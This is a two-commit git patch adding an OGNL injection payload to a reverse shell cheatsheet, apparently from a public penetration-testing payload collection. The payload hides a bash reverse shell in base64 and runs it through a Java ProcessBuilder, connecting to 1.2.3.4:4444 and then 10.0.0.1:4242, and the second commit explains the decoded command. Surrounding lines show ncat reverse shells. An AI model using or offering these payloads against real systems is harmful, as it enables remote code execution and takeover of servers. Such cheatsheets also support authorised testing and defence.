From 3d9363fdc96dbd2b96e5d102284565d9d70c156f Mon Sep 17 00:00:00 2001 From: ToastyCat <56387033+therealtoastycat@users.noreply.github.com> Date: Fri, 5 Jan 2024 09:50:43 +0100 Subject: [PATCH 1/2] Adding reverse shell payload for OGNL --- Methodology and Resources/Reverse Shell Cheatsheet.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index fe020727a1..9c75df995e 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -22,6 +22,7 @@ * [Netcat BusyBox](#netcat-busybox) * [Netcat Traditional](#netcat-traditional) * [NodeJS](#nodejs) + * [OGNL](#ognl) * [OpenSSL](#openssl) * [Perl](#perl) * [PHP](#php) @@ -252,6 +253,12 @@ ncat 10.0.0.1 4242 -e /bin/bash ncat --udp 10.0.0.1 4242 -e /bin/bash ``` +### OGNL + +```java +(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40LzQ0NDQgMD4mMScK | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) +``` + ### OpenSSL Attacker: From 05f441accf5d59e1d171076d38ecb26ae96ac034 Mon Sep 17 00:00:00 2001 From: ToastyCat <56387033+therealtoastycat@users.noreply.github.com> Date: Fri, 5 Jan 2024 10:25:39 +0100 Subject: [PATCH 2/2] Update Reverse Shell Cheatsheet.md adding details --- Methodology and Resources/Reverse Shell Cheatsheet.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 9c75df995e..3143336d92 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -256,9 +256,11 @@ ncat --udp 10.0.0.1 4242 -e /bin/bash ### OGNL ```java -(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40LzQ0NDQgMD4mMScK | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) +(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start()) ``` +With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell. + ### OpenSSL Attacker: